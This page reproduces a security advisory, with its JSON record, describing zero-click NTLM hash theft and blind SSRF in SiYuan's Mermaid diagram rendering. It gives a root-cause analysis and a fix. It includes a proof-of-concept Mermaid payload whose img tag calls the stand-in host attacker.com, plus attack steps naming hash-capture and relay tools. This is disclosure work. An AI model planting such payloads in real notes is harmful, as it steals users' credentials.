GHSA-W95V-4H65-J455

Vulnerability from github – Published: 2026-04-10 19:21 – Updated: 2026-04-10 19:21
VLAI?
Summary
SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering
Details

SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.

On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker.

Root Cause

Mermaid initialization at app/src/protyle/render/mermaidRender.ts lines 28 and 33:

mermaid.initialize({
    securityLevel: "loose",
    flowchart: {
        htmlLabels: true,
    },
});

SVG injection at line 101:

renderElement.lastElementChild.innerHTML = mermaidData.svg;

No DOMPurify or other sanitization between the Mermaid output and DOM insertion.

Mermaid v11.12.0 in "loose" mode strips active JavaScript (<script>, onerror, onload) but explicitly allows <img> tags with src attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.

The Electron main process at app/electron/main.js line 78 sets disable-web-security, and lines 319+ set webSecurity: false, nodeIntegration: true, contextIsolation: false on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.

Proof of Concept

Mermaid code block in a SiYuan note:

```mermaid
graph TD
    A["<img src='//attacker.com/share/img.png'>"] --> B[Normal Node]
```

Rendered SVG output (verified with Mermaid CLI 11.12.0, securityLevel: "loose", htmlLabels: true):

<foreignObject>
  <div xmlns="http://www.w3.org/1999/xhtml">
    <span class="nodeLabel">
      <p><img src="//attacker.com/share/img.png" style="..."></p>
    </span>
  </div>
</foreignObject>

What was stripped by Mermaid's internal sanitizer (verified): onerror, onload, all event handler attributes, <script> tags, file:// URLs.

What survived (verified): <img src="http://...">, <img src="//...">.

Attack steps: 1. Attacker creates a note or .sy export containing the Mermaid block above 2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger) 3. Victim imports the notebook or opens the shared note 4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML 5. Electron fetches //attacker.com/share/img.png

On Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker's SMB server.

On macOS/Linux: Electron makes an HTTP request to the attacker's server, leaking the victim's IP and confirming when the note was read.

Impact

Zero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim's machine.

No configuration changes required. The securityLevel: "loose" setting is hardcoded in SiYuan's Mermaid initialization.

Suggested Fix

Change Mermaid initialization to securityLevel: "strict". If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip <img> tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260407035653-2f416e5253f1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40107"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:21:44Z",
    "nvd_published_at": "2026-04-09T21:16:12Z",
    "severity": "HIGH"
  },
  "details": "SiYuan configures Mermaid.js with `securityLevel: \"loose\"` and `htmlLabels: true`. In this mode, `\u003cimg\u003e` tags with `src` attributes survive Mermaid\u0027s internal DOMPurify and land in SVG `\u003cforeignObject\u003e` blocks. The SVG is injected via `innerHTML` with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL.\n\nOn Windows, a protocol-relative URL (`//attacker.com/image.png`) resolves as a UNC path (`\\\\attacker.com\\image.png`). Windows attempts SMB authentication automatically, sending the victim\u0027s NTLMv2 hash to the attacker.\n\n## Root Cause\n\nMermaid initialization at `app/src/protyle/render/mermaidRender.ts` lines 28 and 33:\n\n    mermaid.initialize({\n        securityLevel: \"loose\",\n        flowchart: {\n            htmlLabels: true,\n        },\n    });\n\nSVG injection at line 101:\n\n    renderElement.lastElementChild.innerHTML = mermaidData.svg;\n\nNo DOMPurify or other sanitization between the Mermaid output and DOM insertion.\n\nMermaid v11.12.0 in \"loose\" mode strips active JavaScript (`\u003cscript\u003e`, `onerror`, `onload`) but explicitly allows `\u003cimg\u003e` tags with `src` attributes in the final SVG output. Verified by rendering the PoC below through the Mermaid CLI with matching configuration.\n\nThe Electron main process at `app/electron/main.js` line 78 sets `disable-web-security`, and lines 319+ set `webSecurity: false`, `nodeIntegration: true`, `contextIsolation: false` on all BrowserWindows. The disabled web security allows protocol-relative URLs to resolve as UNC paths.\n\n## Proof of Concept\n\nMermaid code block in a SiYuan note:\n\n    ```mermaid\n    graph TD\n        A[\"\u003cimg src=\u0027//attacker.com/share/img.png\u0027\u003e\"] --\u003e B[Normal Node]\n    ```\n\nRendered SVG output (verified with Mermaid CLI 11.12.0, `securityLevel: \"loose\"`, `htmlLabels: true`):\n\n    \u003cforeignObject\u003e\n      \u003cdiv xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\n        \u003cspan class=\"nodeLabel\"\u003e\n          \u003cp\u003e\u003cimg src=\"//attacker.com/share/img.png\" style=\"...\"\u003e\u003c/p\u003e\n        \u003c/span\u003e\n      \u003c/div\u003e\n    \u003c/foreignObject\u003e\n\nWhat was stripped by Mermaid\u0027s internal sanitizer (verified): `onerror`, `onload`, all event handler attributes, `\u003cscript\u003e` tags, `file://` URLs.\n\nWhat survived (verified): `\u003cimg src=\"http://...\"\u003e`, `\u003cimg src=\"//...\"\u003e`.\n\nAttack steps:\n1. Attacker creates a note or .sy export containing the Mermaid block above\n2. Attacker hosts a listener on attacker.com (Responder, ntlmrelayx, or HTTP logger)\n3. Victim imports the notebook or opens the shared note\n4. SiYuan renders the Mermaid diagram, injects SVG via innerHTML\n5. Electron fetches `//attacker.com/share/img.png`\n\nOn Windows: Electron resolves the protocol-relative URL as a UNC path. Windows sends NTLMv2 credentials to the attacker\u0027s SMB server.\n\nOn macOS/Linux: Electron makes an HTTP request to the attacker\u0027s server, leaking the victim\u0027s IP and confirming when the note was read.\n\n## Impact\n\nZero-click credential theft on Windows. The victim only needs to view the note. NTLMv2 hashes can be cracked offline or used in relay attacks. On all platforms, the request acts as a tracking pixel and blind SSRF from the victim\u0027s machine.\n\nNo configuration changes required. The `securityLevel: \"loose\"` setting is hardcoded in SiYuan\u0027s Mermaid initialization.\n\n## Suggested Fix\n\nChange Mermaid initialization to `securityLevel: \"strict\"`. If HTML labels are required, add a DOMPurify pass on the SVG output before the innerHTML assignment at mermaidRender.ts:101, configured to strip `\u003cimg\u003e` tags or enforce a strict URI allowlist blocking external and protocol-relative URLs.",
  "id": "GHSA-w95v-4h65-j455",
  "modified": "2026-04-10T19:21:44Z",
  "published": "2026-04-10T19:21:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40107"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SiYuan Affected by Zero-Click NTLM Hash Theft and Blind SSRF via Mermaid Diagram Rendering"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.